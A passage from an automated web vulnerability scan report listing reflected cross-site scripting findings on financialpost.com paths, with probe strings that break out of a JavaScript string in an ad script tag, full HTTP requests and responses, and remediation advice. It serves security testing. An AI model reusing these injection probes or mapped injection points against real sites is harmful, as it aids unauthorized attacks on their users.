Path:   /markets/company/index.html

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 76a86'%3b18777c60d8e was submitted in the REST URL parameter 3. This input was echoed as 76a86';18777c60d8e in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /markets/company/76a86'%3b18777c60d8e HTTP/1.1
Host: www.financialpost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;

Response (redirected)

HTTP/1.1 404 Not Found
Server: Microsoft-IIS/6.0
p3p: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Expires: Sun, 19 Dec 2010 02:58:40 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 02:58:40 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 43339


...[SNIP]...
<script language="JavaScript1.1" src="http://ad.ca.doubleclick.net/N3081/adj/fpo.com/markets/company/76a86';18777c60d8e/index;loc=theTop;loc=top;sz=468x60,728x90;dcopt=ist;kw=ron;kw=markets;kw=company;kw=76a86';18777c60d8e;kw=npo;kw=fpo;tile='+dartad_tile+';'+adcookieTag+surroundTag+'ord=33175995?">
...[SNIP]...

1.126. http://www.financialpost.com/markets/company/news/story.html [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.financialpost.com
Path:   /markets/company/news/story.html

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 72b02'%3ba82f1c7067e was submitted in the REST URL parameter 1. This input was echoed as 72b02';a82f1c7067e in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /markets72b02'%3ba82f1c7067e/company/news/story.html HTTP/1.1
Host: www.financialpost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
p3p: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 68964
Expires: Sun, 19 Dec 2010 02:58:38 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 02:58:38 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co
...[SNIP]...
<script language="JavaScript1.1" src="http://ad.ca.doubleclick.net/N3081/adj/fpo.com/markets72b02';a82f1c7067e/company/news/story;loc=theTop;loc=top;sz=468x60,728x90;dcopt=ist;kw=ron;kw=markets72b02';a82f1c7067e;kw=company;kw=news;kw=npo;kw=fpo;tile='+dartad_tile+';'+adcookieTag+surroundTag+'ord=19334656?">
...[SNIP]...

1.127. http://www.financialpost.com/markets/company/news/story.html [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.financialpost.com
Path:   /markets/company/news/story.html

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 53308'%3bd98cf4b6041 was submitted in the REST URL parameter 2. This input was echoed as 53308';d98cf4b6041 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /markets/company53308'%3bd98cf4b6041/news/story.html HTTP/1.1
Host: www.financialpost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
p3p: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 70239
Expires: Sun, 19 Dec 2010 02:58:46 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 02:58:46 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co
...[SNIP]...
<script language="JavaScript1.1" src="http://ad.ca.doubleclick.net/N3081/adj/fpo.com/markets/company53308';d98cf4b6041/news/story;loc=theTop;loc=top;sz=468x60,728x90;dcopt=ist;kw=ron;kw=markets;kw=company53308';d98cf4b6041;kw=news;kw=npo;kw=fpo;tile='+dartad_tile+';'+adcookieTag+surroundTag+'ord=68119831?">
...[SNIP]...

1.128. http://www.financialpost.com/markets/company/news/story.html [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.financialpost.com
Path:   /markets/company/news/story.html

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f6f73'%3bc39a440a891 was submitted in the REST URL parameter 3. This input was echoed as f6f73';c39a440a891 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /markets/company/newsf6f73'%3bc39a440a891/story.html HTTP/1.1
Host: www.financialpost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 69677
Expires: Sun, 19 Dec 2010 02:58:53 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 02:58:53 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co
...[SNIP]...
<script language="JavaScript1.1" src="http://ad.ca.doubleclick.net/N3081/adj/fpo.com/markets/company/newsf6f73';c39a440a891/story;loc=theTop;loc=top;sz=468x60,728x90;dcopt=ist;kw=ron;kw=markets;kw=company;kw=newsf6f73';c39a440a891;kw=npo;kw=fpo;tile='+dartad_tile+';'+adcookieTag+surroundTag+'ord=97628114?">
...[SNIP]...

1.129. http://www.financialpost.com/markets/company/news/story.html [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.financialpost.com
Path:   /markets/company/news/story.html

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 8ed45'%3be3d4058c973 was submitted in the REST URL parameter 4. This input was echoed as 8ed45';e3d4058c973 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /markets/company/news/8ed45'%3be3d4058c973 HTTP/1.1
Host: www.financialpost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;

Response (redirected)

HTTP/1.1 404 Not Found
Server: Microsoft-IIS/6.0
p3p: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Expires: Sun, 19 Dec 2010 02:59:01 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 02:59:01 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 43481


...[SNIP]...
<script language="JavaScript1.1" src="http://ad.ca.doubleclick.net/N3081/adj/fpo.com/markets/company/news/8ed45';e3d4058c973/index;loc=theTop;loc=top;sz=468x60,728x90;dcopt=ist;kw=ron;kw=markets;kw=company;kw=news;kw=8ed45';e3d4058c973;kw=npo;kw=fpo;tile='+dartad_tile+';'+adcookieTag+surroundTag+'ord=62450243?">
...[SNIP]...

1.130. http://www.financialpost.com/markets/currencies/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.financialpost.com
Path:   /markets/currencies/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 4081d'%3b37f4d0cacb4 was submitted in the REST URL parameter 1. This input was echoed as 4081d';37f4d0cacb4 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /markets4081d'%3b37f4d0cacb4/currencies/ HTTP/1.1
Host: www.financialpost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;

Response (redirected)

HTTP/1.1 404 Not Found
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Expires: Sun, 19 Dec 2010 03:09:08 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 03:09:08 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 43392


...[SNIP]...
<script language="JavaScript1.1" src="http://ad.ca.doubleclick.net/N3081/adj/fpo.com/markets4081d';37f4d0cacb4/currencies/index;loc=theTop;loc=top;sz=468x60,728x90;dcopt=ist;kw=ron;kw=markets4081d';37f4d0cacb4;kw=currencies;kw=npo;kw=fpo;tile='+dartad_tile+';'+adcookieTag+surroundTag+'ord=46209524?">
...[SNIP]...

1.131. http://www.financialpost.com/markets/currencies/ [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.financialpost.com
Path:   /markets/currencies/

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c598b'%3bb34dc10ee96 was submitted in the REST URL parameter 2. This input was echoed as c598b';b34dc10ee96 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /markets/currenciesc598b'%3bb34dc10ee96/ HTTP/1.1
Host: www.financialpost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;

Response (redirected)

HTTP/1.1 404 Not Found
Server: Microsoft-IIS/6.0
p3p: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Expires: Sun, 19 Dec 2010 03:09:17 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 03:09:17 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 43356


...[SNIP]...
<script language="JavaScript1.1" src="http://ad.ca.doubleclick.net/N3081/adj/fpo.com/markets/currenciesc598b';b34dc10ee96/index;loc=theTop;loc=top;sz=468x60,728x90;dcopt=ist;kw=ron;kw=markets;kw=currenciesc598b';b34dc10ee96;kw=npo;kw=fpo;tile='+dartad_tile+';'+adcookieTag+surroundTag+'ord=44005084?">
...[SNIP]...

1.132. http://www.financialpost.com/markets/data/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.financialpost.com
Path:   /markets/data/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 52095'%3bb85c90f4c12 was submitted in the REST URL parameter 1. This input was echoed as 52095';b85c90f4c12 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /markets52095'%3bb85c90f4c12/data/ HTTP/1.1
Host: www.financialpost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;

Response (redirected)

HTTP/1.1 404 Not Found
Server: Microsoft-IIS/6.0
p3p: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Expires: Sun, 19 Dec 2010 03:08:58 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 03:08:58 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 43272


...[SNIP]...
<script language="JavaScript1.1" src="http://ad.ca.doubleclick.net/N3081/adj/fpo.com/markets52095';b85c90f4c12/data/index;loc=theTop;loc=top;sz=468x60,728x90;dcopt=ist;kw=ron;kw=markets52095';b85c90f4c12;kw=data;kw=npo;kw=fpo;tile='+dartad_tile+';'+adcookieTag+surroundTag+'ord=39855799?">
...[SNIP]...

1.133. http://www.financialpost.com/markets/data/ [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.financialpost.com
Path:   /markets/data/

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 90bb7'%3b3637543487d was submitted in the REST URL parameter 2. This input was echoed as 90bb7';3637543487d in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /markets/data90bb7'%3b3637543487d/ HTTP/1.1
Host: www.financialpost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;

Response (redirected)

HTTP/1.1 404 Not Found
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Expires: Sun, 19 Dec 2010 03:09:04 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 03:09:04 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 36419


...[SNIP]...
<script language="JavaScript1.1" src="http://ad.ca.doubleclick.net/N3081/adj/fpo.com/markets/data90bb7';3637543487d/index;loc=theTop;loc=top;sz=468x60,728x90;dcopt=ist;kw=ron;kw=markets;kw=data90bb7';3637543487d;kw=npo;kw=fpo;tile='+dartad_tile+';'+adcookieTag+surroundTag+'ord=49248833?">
...[SNIP]...

1.134. http://www.financialpost.com/markets/detail/index.html [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.financialpost.com
Path:   /markets/detail/index.html

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 219de'%3bb428df72f46 was submitted in the REST URL parameter 1. This input was echoed as 219de';b428df72f46 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /markets219de'%3bb428df72f46/detail/index.html HTTP/1.1
Host: www.financialpost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;

Response

HTTP/1.1 404 Not Found
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Expires: Sun, 19 Dec 2010 02:58:27 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 02:58:27 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 43312


...[SNIP]...
<script language="JavaScript1.1" src="http://ad.ca.doubleclick.net/N3081/adj/fpo.com/markets219de';b428df72f46/detail/index;loc=theTop;loc=top;sz=468x60,728x90;dcopt=ist;kw=ron;kw=markets219de';b428df72f46;kw=detail;kw=npo;kw=fpo;tile='+dartad_tile+';'+adcookieTag+surroundTag+'ord=57259658?">
...[SNIP]...

1.135. http://www.financialpost.com/markets/detail/index.html [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.financialpost.com
Path:   /markets/detail/index.html

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload b430b'%3b1c037b25630 was submitted in the REST URL parameter 2. This input was echoed as b430b';1c037b25630 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /markets/detailb430b'%3b1c037b25630/index.html HTTP/1.1
Host: www.financialpost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;

Response

HTTP/1.1 404 Not Found
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Expires: Sun, 19 Dec 2010 02:58:33 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 02:58:33 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 43276


...[SNIP]...
<script language="JavaScript1.1" src="http://ad.ca.doubleclick.net/N3081/adj/fpo.com/markets/detailb430b';1c037b25630/index;loc=theTop;loc=top;sz=468x60,728x90;dcopt=ist;kw=ron;kw=markets;kw=detailb430b';1c037b25630;kw=npo;kw=fpo;tile='+dartad_tile+';'+adcookieTag+surroundTag+'ord=23504501?">
...[SNIP]...

1.136. http://www.financialpost.com/markets/detail/index.html [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.financialpost.com
Path:   /markets/detail/index.html

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 624ac'%3b26384954959 was submitted in the REST URL parameter 3. This input was echoed as 624ac';26384954959 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /markets/detail/624ac'%3b26384954959 HTTP/1.1
Host: www.financialpost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;

Response (redirected)

HTTP/1.1 404 Not Found
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Expires: Sun, 19 Dec 2010 02:58:39 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 02:58:39 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 43318


...[SNIP]...
<script language="JavaScript1.1" src="http://ad.ca.doubleclick.net/N3081/adj/fpo.com/markets/detail/624ac';26384954959/index;loc=theTop;loc=top;sz=468x60,728x90;dcopt=ist;kw=ron;kw=markets;kw=detail;kw=624ac';26384954959;kw=npo;kw=fpo;tile='+dartad_tile+';'+adcookieTag+surroundTag+'ord=44316867?">
...[SNIP]...

1.137. http://www.financialpost.com/markets/funds/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.financialpost.com
Path:   /markets/funds/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 87abb'%3b4fc39ea6f62 was submitted in the REST URL parameter 1. This input was echoed as 87abb';4fc39ea6f62 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /markets87abb'%3b4fc39ea6f62/funds/ HTTP/1.1
Host: www.financialpost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;

Response (redirected)

HTTP/1.1 404 Not Found
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Expires: Sun, 19 Dec 2010 03:09:07 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 03:09:07 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 36474


...[SNIP]...
<script language="JavaScript1.1" src="http://ad.ca.doubleclick.net/N3081/adj/fpo.com/markets87abb';4fc39ea6f62/funds/index;loc=theTop;loc=top;sz=468x60,728x90;dcopt=ist;kw=ron;kw=markets87abb';4fc39ea6f62;kw=funds;kw=npo;kw=fpo;tile='+dartad_tile+';'+adcookieTag+surroundTag+'ord=32073054?">
...[SNIP]...

1.138. http://www.financialpost.com/markets/funds/ [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.financialpost.com
Path:   /markets/funds/

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a40f3'%3bb938dde38ac was submitted in the REST URL parameter 2. This input was echoed as a40f3';b938dde38ac in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /markets/fundsa40f3'%3bb938dde38ac/ HTTP/1.1
Host: www.financialpost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;

Response (redirected)

HTTP/1.1 404 Not Found
